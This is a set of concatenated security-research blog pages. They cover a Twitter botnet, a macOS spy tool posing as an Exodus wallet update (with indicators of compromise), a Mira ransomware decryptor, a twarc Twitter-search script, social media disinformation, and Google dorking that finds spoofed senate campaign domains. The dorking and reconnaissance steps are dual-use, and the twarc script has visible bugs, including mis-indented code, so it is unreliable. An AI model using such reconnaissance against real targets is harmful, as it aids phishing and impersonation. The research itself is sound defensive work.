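flagged = [t for t in tweets if uses_shortener(t)]
```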

As we can see, the Tweets containing shortened URLs date back only 21 days. Here’s a distribution of domains seen in those Tweets.

My current hypothesis is that the owner of the previous botnet has purchased a batch of Twitter accounts (of varying ages) and has been, at least for the last 21 days, repurposing those accounts to advertise adult dating sites using the new pinned-Tweet approach.

One final thing – I checked the 2895 survivor accounts from the previously discovered botnet to see if any had been reconfigured to use a pinned Tweet. At the time of checking, only one of those accounts had been changed.

If you’re interested in looking at the data I collected, I’ve uploaded names/ids of all discovered accounts, the follower/following mappings found between these accounts, the gephi save file for the 80,000 node graph, and a list of accounts queried by my script (in case someone would like to continue iterating through the unqueried accounts.) You can find all of that data in this github repo.



Articles with similar Tags
#####EOF##### Ransomware | News from the Lab
Articles with the Tag

#ransomware

#####EOF##### Boost | News from the Lab
Articles with the Tag

#boost

#####EOF##### Crypto | News from the Lab
Articles with the Tag

#crypto

#####EOF##### #####EOF##### Spam campaign targets Exodus Mac Users | News from the Lab

Spam campaign targets Exodus Mac Users

We’ve seen a small spam campaign that attempts to target Mac users that use Exodus, a multi-cryptocurrency wallet.

The theme of the email focuses mainly on Exodus. The attachment was “Exodus-MacOS-1.64.1-update.zip” and the sender domain was “update-exodus[.]io”, suggesting an attempt to associate itself with the organization. It tried to deliver a fake Exodus update using the subject “Update 1.64.1 Release – New Assets and more”, even though the latest released version of Exodus is 1.63.1.

Fake Exodus Update email

Extracting the attached archive reveals the application, which was apparently created just the day before.

Spytool’s creation date

The application contains a Mach-O binary with the filename “rtcfg”. The legitimate Exodus application, however, uses “Exodus”.

We checked the strings and found a bunch of references to the “realtime-spy-mac[.]com” website.

On the website, the developer describes the software as a cloud-based surveillance and remote spy tool. The standard offering costs $79.95 and includes a cloud-based account where users can view the images and data the tool uploads from the target machine. The strings extracted from the Mac binary in the spam campaign coincide with the features advertised for the realtime-spy-mac[.]com tool.

Strings inside the Realtime-Spy tool

Searching for similar instances of the Mac keylogger in our repository yielded other samples using these filenames:

  • taxviewer.app
  • picupdater.app
  • macbook.app
  • launchpad.app

Based on the spy tool’s website, it appears to support not only Mac but also Windows. It’s not the first time we’ve seen Windows threats target Mac. As crimeware threat actors on Windows take advantage of the cryptocurrency trend, they seem to want to expand their reach, and so have ended up targeting Mac users as well.

Indicators of Compromise

SHA1:

  • b6f5a15d189f4f30d502f6e2a08ab61ad1377f6a – rtcfg
  • 3095c0450871f4e1d14f6b1ccaa9ce7c2eaf79d5 – Exodus-MacOS-1.64.1-update.zip
  • 04b9bae4cc2dbaedc9c73c8c93c5fafdc98983aa – picupdater.app.zip
  • c22e5bdcb5bf018c544325beaa7d312190be1030 – taxviewer.app.zip
  • d3150c6564cb134f362b48cee607a5d32a73da66 – launchpad.app.zip
  • bf54f81d7406a7cfe080b42b06b0a6892fcd2f37 – macbook.app.zip

Detection:

  • Monitor:OSX/Realtimespy.b6f5a15d18!Online

Domain:

  • realtime-spy-mac[.]com
  • update-exodus[.]io

 



Articles with similar Tags
#####EOF##### F-Secure
F-Secure RADAR
Secure the perimeter
F-SECURE INTERNET SECURITY
The acclaimed F-Secure Internet Security lets you browse the internet, shop online, and use online banking without worrying about your security. With F-Secure Internet Security you get instant protection against malware, hackers, and identity theft.
BUSINESS PROTECTION SUITES
We offer two business protection suites, depending on your needs
BECOME OUR PARTNER
Our partner program combines financial benefits, services, and tools to support your business development.

THE BEST ANTIVIRUS PROTECTION FOR YOU AND YOUR COMPUTER

With over 26 years of experience in information security, F-Secure offers complete protection solutions for every device. Our products include modules for antivirus protection, a firewall, application management, anti-theft protection for mobile devices, protection of personal data against all kinds of threats, parental control, and other vital components. Choose the solution that is right for you.

F-SECURE
INTERNET
SECURITY

  • Carefree internet browsing
  • Parental control
  • Secure online banking
  • Email protection
  • Automatic updates

F-SECURE
SAFE

  • Protection for all types of devices
  • Quick and easy to install
  • Protection against online threats
  • Safe internet browsing
  • Secure online banking

EXPERIENCE IS THE KEY TO SUCCESS

THE BEST PROTECTION YEAR AFTER YEAR

The technology used in F-Secure solutions has won the independent AV-TEST laboratory's "Best Protection" award for corporate protection in 5 of six consecutive years (2011-2016).

DOWNLOAD THE LATEST VERSIONS OF F-SECURE PRODUCTS

INFODESIGN GROUP IS THE SOLE AUTHORIZED DISTRIBUTOR OF F-SECURE FOR BULGARIA, ROMANIA, AND MOLDOVA

BUSINESS PROTECTION SOLUTIONS

F-Secure combines functionality with automatic updates of third-party software applications, providing intelligent solutions for small businesses and large corporations alike.

PROTECTION SERVICE FOR BUSINESS

A complete protection solution for small and medium businesses, managed through a web console.

MESSAGING SECURITY
GATEWAY

A specialized solution for filtering email traffic. Stop up to 99% of spam!

SECURITY FOR VIRTUAL AND CLOUD ENVIRONMENT

A solution for protecting virtual environments such as VMware, Citrix, and Hyper-V.

BECOME OUR PARTNER

Our partner program includes financial benefits, services, and tools that will help you build your business. F-Secure is the first and only vendor to win the independent AV-TEST laboratory's "Best Protection" award for corporate protection in 5 of six consecutive years (2011-2016).

WHY BECOME OUR PARTNER?

Maximize your profit by becoming our partner.

OUR PARTNERS

Find the partner nearest to you.

NEED MORE INFORMATION?

Don't waste time! Contact us NOW!


#####EOF##### CryptoMiner | News from the Lab
Articles with the Tag

#cryptominer-2

#####EOF##### Frederic Vila | News from the Lab
About

Frederic Vila

Latest articles from

Frederic Vila

#####EOF##### Khasaia | News from the Lab
About

Khasaia


Junior Threat Researcher @ F-Secure
Twitter: @_qaz_qaz

Latest articles from

Khasaia

#####EOF##### Mira Ransomware Decryptor | News from the Lab

Mira Ransomware Decryptor

We investigated a recent ransomware called Mira (Trojan:W32/Ransomware.AN) to check whether it’s feasible to decrypt the encrypted files.

Most often, decryption is very challenging because the keys needed for decryption are missing. In the case of Mira, however, the ransomware appends all the information required to decrypt a file to the encrypted file itself.

Encryption Process

The ransomware first initializes a new instance of the Rfc2898DeriveBytes class to generate a key. This class takes a password, salt, and iteration count.


The password is generated using the following information:

  • Machine name
  • OS Version
  • Number of processors


The salt, on the other hand, is generated by a Random Number Generator (RNG):


The ransomware then proceeds to use the Rijndael algorithm to encrypt files:


After encryption, it appends a ‘header’ structure to the end of the file.

This header conveniently contains the salt and the password hash. In addition to that, the iteration count is hard-coded into the sample, in this case, the value was 20.

By retrieving the password, salt, and the iteration count from the ransomware itself, we were able to obtain all the information needed to create a decryption tool for the encrypted files.
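.NET's Rfc2898DeriveBytes class implements PBKDF2 with HMAC-SHA1, so the same key material can be reproduced outside .NET. Here is a minimal sketch in Python with illustrative inputs only: the key/IV split and all input values below are assumptions for demonstration, not values taken from the sample:

```python
import hashlib

def derive_key_material(password, salt, iterations=20, length=48):
    """Reproduce Rfc2898DeriveBytes output: PBKDF2 with HMAC-SHA1.
    48 bytes is enough to split into, e.g., a 32-byte key and a 16-byte IV
    for a Rijndael/AES decryption step."""
    return hashlib.pbkdf2_hmac("sha1", password, salt, iterations, dklen=length)

# Illustrative inputs only: the real sample builds the password from the
# machine name, OS version, and processor count, and reads the salt from
# the header appended to each encrypted file.
material = derive_key_material(b"MACHINE-6.1.7601-4", b"\x00" * 16)
key, iv = material[:32], material[32:]
```

Given the derived key and IV, the remaining decryption step is a standard Rijndael decryption of the file body, stopping before the appended header.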

Decryption tool

You can download our decryption tool from here.

Here’s a video of how you can use our tool:

 



Articles with similar Tags
#####EOF##### Searching Twitter With Twarc | News from the Lab

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def save_csv(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    handle.write(u"Source,Target,Weight\n")
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + u"," + target + u"," + unicode(count) + u"\n")

def save_text(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(unicode(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
      interactions.append(replied_to)
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
            interactions.append(mention)
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
          if hashtag is not None and hashtag not in hashtags:
            hashtags.append(hashtag)
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
      if "urls" in entities:
        for item in entities["urls"]:
          if item is not None and "expanded_url" in item:
            url = item['expanded_url']
            if url is not None and url not in urls:
              urls.append(url)
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
              urls.append(murl)
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]
  else:
    print("No search terms provided. Exiting.")
    sys.exit(0)

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
    else:
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
      os.makedirs(save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in twarc.search(target):
# Output some status as we go, so we know something is happening
      sys.stdout.write("\r")
      sys.stdout.flush()
      sys.stdout.write("Collected " + str(tweet_count) + " tweets.")
      sys.stdout.flush()
      tweet_count += 1
    
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
      else:
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if "id_str" is not None and "screen_name" is not None:
        tweet_url = "https://twitter.com/" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
      if interactions is not None:
        for user in interactions:
          mentioned_frequency_dist[user] += 1
          if screen_name not in user_user_graph:
            user_user_graph[screen_name] = {}
          if user not in user_user_graph[screen_name]:
            user_user_graph[screen_name][user] = 1
          else:
            user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
            hashtag_interactions.append(comb)
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
              else:
                hashtag_hashtag_graph[item1][item2] += 1
          for hashtag in hashtags:
            hashtag_frequency_dist[hashtag] += 1
            if screen_name not in user_hashtag_graph:
              user_hashtag_graph[screen_name] = {}
            if hashtag not in user_hashtag_graph[screen_name]:
              user_hashtag_graph[screen_name][hashtag] = 1
            else:
              user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:
            all_image_urls.append(url)

# Iterate through image URLs, fetching each image if we haven't already
    print("")
    print("Fetching images.")
    pictures_dir = os.path.join(save_dir, "images")
    if not os.path.exists(pictures_dir):
      print("Creating directory: " + pictures_dir)
      os.makedirs(pictures_dir)
    for url in all_image_urls:
      m = re.search("^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
      if m is not None:
        filename = m.group(1)
        print("Getting picture from: " + url)
        save_path = os.path.join(pictures_dir, filename)
        if not os.path.exists(save_path):
          response = requests.get(url, stream=True)
          with open(save_path, 'wb') as out_file:
            shutil.copyfileobj(response.raw, out_file)
          del response

# Output a bunch of files containing the data we just gathered
    print("Saving data.")
    json_outputs = {"tweets.json": tweets,
                    "urls.json": url_frequency_dist,
                    "hashtags.json": hashtag_frequency_dist,
                    "influencers.json": influencer_frequency_dist,
                    "mentioned.json": mentioned_frequency_dist,
                    "user_user_graph.json": user_user_graph,
                    "user_hashtag_graph.json": user_hashtag_graph,
                    "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
    for name, dataset in json_outputs.iteritems():
      filename = os.path.join(save_dir, name)
      save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
    csv_outputs = {"user_user_graph.csv": user_user_graph,
                   "user_hashtag_graph.csv": user_hashtag_graph,
                   "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
    for name, dataset in csv_outputs.iteritems():
      filename = os.path.join(save_dir, name)
      save_csv(dataset, filename)

    text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                    "influencers.txt": influencer_frequency_dist,
                    "mentioned.txt": mentioned_frequency_dist,
                    "urls.txt": url_frequency_dist}
    for name, dataset in text_outputs.iteritems():
      filename = os.path.join(save_dir, name)
      save_text(dataset, filename)

Running this tool will create a directory for each search term provided at the command line. To search for a sentence, or to include multiple terms, enclose the argument in quotes. Due to Twitter’s rate limiting, your search may hit a limit and need to pause until the rate limit resets. Luckily, twarc takes care of that. Once the search is finished, a set of output files will be written to the previously created directory.

Since I use a Mac, I can use the Finder’s Quick Look functionality to browse the output files. As pytorch is gaining a lot of interest, I ran my script against that search term. Here are some examples of how I can quickly view the output files.

The preview pane is enough to get an overview of the recorded data.

 

Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane.

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.
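Gephi aside, the same Source,Target,Weight CSVs the script writes can be summarized in a few lines of Python. A minimal sketch (the file name is assumed to match the script's output; "influence" here is just total incoming edge weight):

```python
import csv
from collections import Counter

def top_influencers(csv_path, n=10):
    """Rank accounts by total incoming edge weight in a
    Source,Target,Weight CSV (a rough proxy for influence)."""
    indegree = Counter()
    with open(csv_path, newline="", encoding="utf-8") as handle:
        for row in csv.DictReader(handle):
            indegree[row["Target"]] += int(row["Weight"])
    return indegree.most_common(n)
```

Running this against user_user_graph.csv gives a quick, sortable list of the accounts that received the most retweets, replies, and mentions, without opening a visualization tool.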

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!



#####EOF##### Why Social Network Analysis Is Important | News from the Lab

Why Social Network Analysis Is Important

I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and Python modules that wrap Twitter’s API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks (like mapping the time of day that @realDonaldTrump tweets) and then moved on to creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.

The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.

Perhaps some pictures will help explain this better. Here’s a visualization of conversations about Brexit that happened between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.

Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often have a larger font.

Here’s what the conversation space looked like between the 14th and 15th of January, 2019.

Notice how the shape of the visualization has changed. Every snapshot produces a different picture that reflects the opinions, issues, and participants in that particular conversation space at the moment it was recorded. Here’s one more – this time from the 20th to 21st of January, 2019.

Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.

And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.

I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.

The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.

A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, in which he describes social media becoming a “psychological panopticon”.

The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:

  • The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
  • If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
  • If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
  • The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
  • The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.
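The reinforcement dynamic described in the list above can be sketched as a toy simulation. This is entirely hypothetical – a recommender that mostly shows opinion-aligned content, and a user whose leaning drifts with what they are shown; every number is illustrative, not from any real platform:

```python
import random

def run_feedback_loop(steps=200, bias=0.9, seed=42):
    """Toy model of an engagement-optimizing feed.

    The recommender shows content aligned with the user's current
    leaning with probability `bias`; each aligned item nudges the
    leaning further in the same direction (a crude stand-in for
    opinion reinforcement). Leaning is clamped to [-1, 1].
    """
    rng = random.Random(seed)
    leaning = 0.1  # user starts nearly neutral
    history = [leaning]
    for _ in range(steps):
        sign = 1.0 if leaning >= 0 else -1.0
        shown = sign if rng.random() < bias else -sign
        leaning = max(-1.0, min(1.0, leaning + 0.02 * shown))
        history.append(leaning)
    return history
```

With `bias` well above 0.5 the leaning saturates at an extreme, while at `bias = 0.5` it just performs a random walk – the “optimization loop” only appears when the recommender systematically favors aligned content.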

Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a user is suicidal, or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users’ moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.

If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to their recommendation algorithms exactly because of problems it was causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube’s algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and were thus pushed up by the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in turn, viewed by this same group of users. YouTube’s recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.

Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.

The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.

Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.

It’s not just the engineers of social networks that need to understand how they work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they’re part of our everyday lives, and obviously they’re here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.

The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.

The Orville, “Majority Rule”. A vote badge worn by all citizens of the alien world Sargus 4, allowing the wearer to receive positive or negative social currency. Source: youtube.com

We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.



#####EOF##### How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018 | News from the Lab

How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28 A.K.A. “Fancy Bear” according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details.

Many of the subsequent (non-technical) articles that have been published have focused almost exclusively on the fact that McCaskill is running for re-election in 2018. But is it really conclusive that this hacking attempt was about the 2018 midterms? After all, Senator McCaskill is the top-ranking Democrat on the Homeland Security & Governmental Affairs Committee and also sits on the Armed Services Committee. Perhaps she and her staffers were instead targeted for insights into on-going Senate investigations?

Senator Claire McCaskill's Committee Assignments

Because if you want to target an election campaign, you should target the candidate’s campaign server, not their government accounts. (Elected officials cannot use government accounts/resources for their personal campaigns.) In the case of Senator McCaskill, the campaign server is: clairemccaskill.com.

Which appears to be a WordPress site.

clairemccaskill.com/robots.txt

Running on an Apache server.

clairemccaskill.com Apache error log

And it has various e-mail addresses associated with it.

clairemccaskill.com email addresses

That looks interesting, right? So… let’s do some Google dorking!

Searching for “clairemccaskill.com” in URLs while discarding the actual site yielded a few pages of results.

Google dork: inurl:clairemccaskill.com -site:clairemccaskill.com

And on page two of those results, this…

clairemccaskill.com.de

Definitely suspicious.

What is com.de? It’s a domain on the .de TLD (not a TLD itself).

.com.de

Okay, so… what other interesting domains associated with com.de are there to discover?

How about additional US Senators up for re-election such as Florida Senator Bill Nelson? Yep.

nelsonforsenate.com.de

Senator Bob Casey? Yep.

bobcasey.com.de

And Senator Sheldon Whitehouse? Yep.

whitehouseforsenate.com.de

But that’s not all. Democrats aren’t the only ones being spoofed.

Iowa Senate Republicans.

iowasenaterepublicans.com.de

And “Senate Conservatives“.

senateconservatives.com.de
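The pattern behind these look-alikes is mechanical enough to enumerate: each spoof is simply the legitimate .com name with a .de suffix appended. A sketch (the candidate list is illustrative, and whether a candidate actually exists would still need a DNS lookup):

```python
def com_de_variants(domains):
    """Build the com.de look-alike for each legitimate .com domain:
    'example.com' -> 'example.com.de'."""
    return [d + ".de" for d in domains if d.endswith(".com")]

# Hypothetical watch list of legitimate campaign domains
candidates = com_de_variants([
    "clairemccaskill.com",
    "nelsonforsenate.com",
    "bobcasey.com",
])
```

A defender could run a list of campaign domains through a helper like this and periodically check which candidates resolve, rather than stumbling on them via search results.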

Hmm. Well, while we’re no closer to knowing whether or not Senator McCaskill’s government accounts were actually targeted because of the midterm elections – the domains shown above are definitely shady AF. And enough to give cause for concern that the 2018 midterms are indeed being targeted, by somebody.

(Our research continues.)

Meanwhile, the FBI might want to get in touch with the owners of com.de.



#####EOF##### Taking Pwnie Out On The Town | News from the Lab

Taking Pwnie Out On The Town

Black Hat 2018 is now over, and the winners of the Pwnie Awards have been published. The Best Client-Side Bug was awarded to Georgi Geshev and Rob Miller for their work called “The 12 Logic Bug Gifts of Christmas.”

Pwnies2018 The Pwnie Awards

Georgi and Rob work for MWR Infosecurity, which (as some of you might remember) was acquired by F-Secure earlier this year. Both MWR and F-Secure have a long history of geek culture. One thing we’ve done for years, is to take our trophies (or “Poikas”) for a trip around the town. For an example, see this.

So, while the Pwnie is still here in Helsinki before going home to the UK, we took it around the town!

Pwnie2018 HQ

Pwnie at the F-Secure HQ.

Pwnie2018 Kanava

Pwnie at Ruoholahdenkanava.

Pwnie2018 Harbour

Pwnie at the West Harbour.

Pwnie2018 Baana

Pwnie looks at the Baana.

Pwnie2018 Museum

Pwnie and some Atari 2600s and laptops at the Helsinki computer museum.

Pwnie2018 MIG

Pwnie looking at a Mikoyan-Gurevich MiG-21 supersonic interceptor.

Pwnie2018 Tennispalatsi

Pwnie at the Art Museum.

Pwnie2018 awards

Pwnie chilling on our award shelf.

Pwnie2018 Parliament

Pwnie at the house of parliament.

pwnie2018_tuomiokirkko

Pwnie at the Tuomiokirkko Cathedral.

Thanks for all the bugs, MWR!

Mikko

P.S. If you’re wondering about the word “Poika” we use for trophies, here’s a short documentary video that explains it in great detail.



#####EOF##### OSINT For Fun & Profit: @realDonaldTrump Edition | News from the Lab

OSINT For Fun & Profit: @realDonaldTrump Edition

